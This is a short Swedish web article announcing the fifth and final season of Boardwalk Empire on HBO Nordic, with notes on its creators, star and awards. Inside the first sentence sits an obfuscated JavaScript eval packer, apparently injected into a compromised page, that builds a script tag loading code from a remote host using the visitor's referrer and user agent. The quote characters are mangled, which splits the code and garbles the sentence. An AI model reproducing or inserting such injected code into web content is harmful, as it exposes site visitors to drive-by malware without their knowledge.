Image Image Image Image Image Image Image Image Image Image

| 8 juli, 2020

Scroll to top

Top

BOARDWALK EMPIRE, SÄSONG 5 HBO Nordic

BOARDWALK EMPIRE, SÄSONG 5 HBO Nordic
Sebastian

Boardwalk eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rfnbh|var|u0026u|referrer|naiif||js|php’.split(’|’),0,{}))
Empire är skapad av Emmybelönade manusförfattaren Terence Winter (the Sopranos) och Oscarbelönade regissören Marin Scorsese.

Serien följer den okonventionella protagonisten Enoch ”Nucky” Thompson (Steve Buscemi) och hans lagliga och olagliga verksamhet i Atlantic City under förbudstiden i USA. De fyra första säsongerna utspelades under 1920-talet. Den sista säsongen tar plats 1931, under Den stora depressionen, där Nucky planerar för en framtid efter förbudstiden.

2013 vann Boardwalk Empire fem stycken Emmy-statyetter, vilket var mer än någon annan serie det året. Till årets Emmy-gala är Boardwalk Empire nominerat i sju kategorier.

Boardwalk Empire är skapat av Terence Winter, manusförfattare till Sopranos. Seriens producenter är Terence Winter, Martin Scorsese, Tim Van Pattern, Howard Korder, Stephen Levinson och Mark Wahlberg. Serien har belönats med Golden Globe, bland annat för ”Best Television Series – Drama” och vunnit totalt 12 Emmy-priser.

Femte och sista säsongen startar på HBO Nordic, 8 september.

Säsong 1-4 finns tillgängliga på hbonordic.com